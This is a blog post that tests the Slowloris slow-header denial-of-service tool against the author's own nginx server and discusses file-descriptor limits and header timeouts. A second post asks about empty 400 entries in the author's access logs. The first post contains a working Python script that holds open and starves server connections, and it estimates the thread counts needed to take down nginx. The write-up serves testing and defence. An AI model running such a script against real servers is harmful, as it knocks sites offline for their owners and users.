
Testing Slowloris against nginx

CCCCCCCCCCOOCCOOOOO888@8@8888OOOOCCOOO888888888@@@@@@@@@8@8@@@@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888@888888OOOCCCOOOO888888888888@88888@@@@@@@888@8OOCCoococc:::
CCCCCCCCCCCCCCOO88@@888888OOOOOOOOOO8888888O88888888O8O8OOO8888@88@@8OOCOOOCoc::
CCCCooooooCCCO88@@8@88@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888@8888OOOCc::::
CooCoCoooCCCO8@88@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88@88888@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88@888OCoccc
ooooCCOO8O888888888@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8@@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8@@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8@8@8Ooc:.:...cOO8O88c.      .  .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888@8@88888888Oo:. .  ...cO888Oc..          .oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888@88888888888Oo:.       .O8888C:  .oCOo.  ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo:       :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8@88OO8O888Oo:::... ..  :cO8Oc. . .....  :.  .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8@8Coc::..  ....  ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8@8OOCCOc:...  ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8@8@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
 ..... ............. .coocoooCCoco:::ccccccc:::ccc::..........  ....:::cc::::coC
   .  . ...    .... ..  .:cccoCooc:..  ::cccc:::c:.. ......... ......::::c:cccco
  .  .. ... ..    .. ..   ..:...:cooc::cccccc:.....  .........  .....:::::ccoocc
       .   .         .. ..::cccc:.::ccoocc:. ........... ..  . ..:::.:::::::ccco

Testing RSnake's Slowloris tool against a test nginx setup of my own: at first glance nginx is indeed not susceptible to such an attack, but observing the actual behaviour turns up some weird points. Will write more when I have some more answers/observations.

Conclusions can be found at the bottom of this post, if you can’t stand reading about experiments and whatnot.

Edit (15 Oct)

It seems that nginx is indeed affected by the Slowloris attack. Whilst the attack is in progress, no other connections can be made to the server (thus causing the DoS situation).

Based on the way Slowloris works (sending headers slooooowly), the reason this works against nginx is the max file descriptors limit. Apparently each network connection to a process uses up one file descriptor, and the OS limits this number per process (ulimit -n in Linux). By default it is set to 1024, though it can be changed.
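As a rough illustration (my own sketch, not part of the original tests), the same soft/hard limits that ulimit -n reports can be read from Python via the resource module:

import resource

# Soft and hard limits on open file descriptors for the current process.
# The soft limit is what actually caps the number of open sockets;
# on many Linux boxes it defaults to 1024.
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
print("soft limit: %d, hard limit: %d" % (soft, hard))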

I’m not sure whether this is exactly the same as the original Slowloris attack, because Slowloris exhausts a web-server-specific resource (Apache’s MaxClients, for example), whereas hitting the max file descriptor limit is an OS/process-level “resource”.

This is a problem nonetheless, because even if we raise the max file descriptors limit for the nginx process, they can still all be taken up by long-lived, slow-sending HTTP requests like the ones Slowloris makes.  The only difference is that it would take FAR more connections to Slowloris-attack an nginx server successfully, compared to process-based web servers like Apache.
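To make the mechanism concrete, here is a rough Python sketch (my own illustration, not RSnake's actual code) of the kind of connection Slowloris holds open: send an incomplete request, then trickle one bogus header line every few seconds so the server keeps the connection, and its file descriptor, occupied. The target address and the numbers are placeholders for a test setup.

import socket
import time

TARGET = ("192.0.2.10", 80)   # placeholder address of a test nginx box
CONNECTIONS = 200             # each of these costs the server one file descriptor
INTERVAL = 10                 # seconds between trickled header lines

socks = []
for _ in range(CONNECTIONS):
    s = socket.create_connection(TARGET, timeout=5)
    # Incomplete request: no terminating blank line, so the server
    # keeps waiting for the rest of the headers.
    s.send(b"GET / HTTP/1.1\r\nHost: example.com\r\n")
    socks.append(s)

while socks:
    time.sleep(INTERVAL)
    for s in list(socks):
        try:
            s.send(b"X-a: b\r\n")   # keep the connection looking alive
        except OSError:
            socks.remove(s)         # the server has timed this one out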

A problem encountered so far is that nginx seems not to honour the client_header_timeout directive as expected: it starts returning a “Request time out” status (408) to the Slowloris threads after a while, even when Slowloris’s send interval is set far lower than the nginx timeout.  Will need to check up more on this, though with this behaviour nginx automatically recovers from a Slowloris attack after a while 😛

Edit (27 Oct)

After checking out ids’ and maxim’s replies in the forums, I did some tests with the max file descriptors raised for the nginx process. I did it not by raising the ulimit -n value, but by setting worker_rlimit_nofile to a higher value. As a result nginx was able to take in “more” concurrent incoming connections this time, at least until the new limit for the nginx process was hit.
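To confirm that the higher limit actually applied to the workers, the effective limit of a running worker can be read from /proc; a small Python helper along these lines (illustrative only; the PID is a placeholder you would look up with ps or from nginx's pid file):

WORKER_PID = 12345   # placeholder: an actual nginx worker PID

# /proc/<pid>/limits lists the effective resource limits of that process,
# including the "Max open files" row that worker_rlimit_nofile raises.
with open("/proc/%d/limits" % WORKER_PID) as f:
    for line in f:
        if line.startswith("Max open files"):
            print(line.rstrip())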

An interesting thing of note is that the client_header_timeout directive determines how much time a connection has to finish sending its headers for the request to be processed, and not how long nginx is willing to wait after receiving a header before it deems the connection timed out.  This turned out to be the main factor in defending nginx against Slowloris, when combined with nginx’s other characteristics.
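A simple way to check this interpretation (my own test sketch, nothing official) is to open a single connection, trickle a header line every 10 seconds, and time how long nginx takes to give up. If client_header_timeout counted the gap between headers, the connection below would never be dropped; instead the 408 arrives roughly client_header_timeout seconds after the request started:

import select
import socket
import time

start = time.time()
s = socket.create_connection(("192.0.2.10", 80))   # placeholder test server
s.send(b"GET / HTTP/1.1\r\nHost: example.com\r\n")

while True:
    # Wait up to 10 seconds for the server to say anything.
    readable, _, _ = select.select([s], [], [], 10)
    if readable:
        data = s.recv(4096)          # the 408 response (or b"" on a plain close)
        print("server gave up after %.0f seconds" % (time.time() - start))
        print(data.decode(errors="replace"))
        break
    # Nothing yet: send one more header line, well within any per-header
    # wait, but the headers never actually complete.
    s.send(b"X-a: b\r\n")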

Conclusions

1. nginx is able to defend against small- to mid-scale Slowloris attacks because it terminates requests that have not completed within a specified time (60 sec by default).  Thus the basic Slowloris attack WON’T work, since it relies on sending headers one at a time to keep a connection occupied.

2. nginx can be downed by Slowloris, however, if many attack nodes are used.  We would need a total of (nginx’s file descriptor limit) / 50 Slowloris threads to successfully mount an attack; 50 because Slowloris is coded to run 50 connections per thread.  This would (in theory) cause any released connections to be quickly taken up again by new Slowloris connections.  Slowloris’s send interval would also have to be set below 60 secs to work.  This is more like a DDoS attack than a Slowloris attack though…

3. The problem with (2) above is that we might need a huge amount of resources to mount it (DDoS level?).  If nginx were set to a 100,000 max open files limit, we would then need 100,000 / 50 = 2000 Slowloris threads! (See the quick calculation after this list.)

4. The access logs for nginx show the attack in progress as it kicks out the client connections 🙂
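The quick calculation referenced in point 3, just to spell out the arithmetic (the 50-connections-per-thread figure is Slowloris's default as noted above, and the limit value is only an example):

CONNECTIONS_PER_THREAD = 50   # Slowloris runs 50 connections per thread
fd_limit = 100000             # example max open files limit for the nginx worker

# Number of attacking threads needed to keep every descriptor occupied
# (rounded up).
threads_needed = -(-fd_limit // CONNECTIONS_PER_THREAD)
print(threads_needed)         # prints 2000 for the numbers above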

So… nginx is a good web server, use it! 😉

Weird web server access log entries

Don’t have the answer to this yet, but it sure makes me really really curious as to the cause.

In my web server access logs, I get plenty of entries that look like this:
69.64.58.126 - - [02/Oct/2009:14:20:55 +0800] "-" 400 0 "-" "-"

That means that these IP addresses have been connecting to my server via a particular domain, without sending any request whatsoever, or so it seems. And I get a LOT of accesses from Singnet IP addresses (in the 220.255.0.0/16 range) daily.

Have contacted them about this, but no answers as yet. And the only answer from a forum was that it’s probably load-balancer-generated traffic (which doesn’t explain why I get many, many requests from an entire Class C worth of IP addresses).
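For what it's worth, an entry of that shape can be produced (an assumption on my part, worth verifying against your own setup) by a client that opens a TCP connection and then closes it without sending anything at all, which is exactly what a plain TCP health check from a load balancer does:

import socket

# Connect to the web server and close the connection without sending a
# single byte, the way a load balancer's TCP health check might.
s = socket.create_connection(("192.0.2.10", 80))   # placeholder server address
s.close()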

Not sure whether it was this thing that caused my 1Portfolio account to overuse server resources, since Apache (with the prefork MPM) is known to fork a new process for every new incoming connection, as opposed to event-driven web servers like nginx. (And I’m still pissed at how they did NOT contact me whatsoever when they had to terminate my account immediately due to the resource overuse.)

If anyone has answers/possibilities I’d sure like to hear and discuss on them!